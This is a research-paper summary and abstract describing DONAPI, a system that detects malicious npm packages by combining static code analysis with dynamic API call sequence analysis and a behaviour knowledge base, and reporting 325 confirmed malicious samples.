DONAPI: Malicious NPM Packages Detector using Behavior Sequence Knowledge Mapping

TL;DR

DONAPI is a novel system that combines static and dynamic analysis to detect malicious npm packages by analyzing behavior sequences and knowledge mapping, significantly improving security in the npm ecosystem.

Contribution

It introduces a hierarchical classification framework and behavior knowledge base for malicious package detection, integrating static code analysis with dynamic API call sequence analysis.

Findings

Identified 325 malicious npm packages

Discovered 2 new API calls and 246 API call sequences

Enhanced detection accuracy through behavior knowledge mapping

Abstract

With the growing popularity of modularity in software development comes the rise of package managers and language ecosystems. Among them, npm stands out as the most extensive package manager, hosting more than 2 million third-party open-source packages that greatly simplify the process of building code. However, this openness also brings security risks, as evidenced by numerous package poisoning incidents. In this paper, we synchronize a local package cache containing more than 3.4 million packages in near real-time to give us access to more package code details. Further, we perform manual inspection and API call sequence analysis on packages collected from public datasets and security reports to build a hierarchical classification framework and behavioral knowledge base covering different sensitive behaviors. In addition, we propose the DONAPI, an automatic malicious npm packages detector that combines static and dynamic analysis. It makes preliminary judgments on the degree of maliciousness of packages by code reconstruction techniques and static analysis, extracts dynamic API call sequences to confirm and identify obfuscated content that static analysis can not handle alone, and finally tags malicious software packages based on the constructed behavior knowledge base. To date, we have identified and manually confirmed 325 malicious samples and discovered 2 unusual API calls and 246 API call sequences that have not appeared in known samples.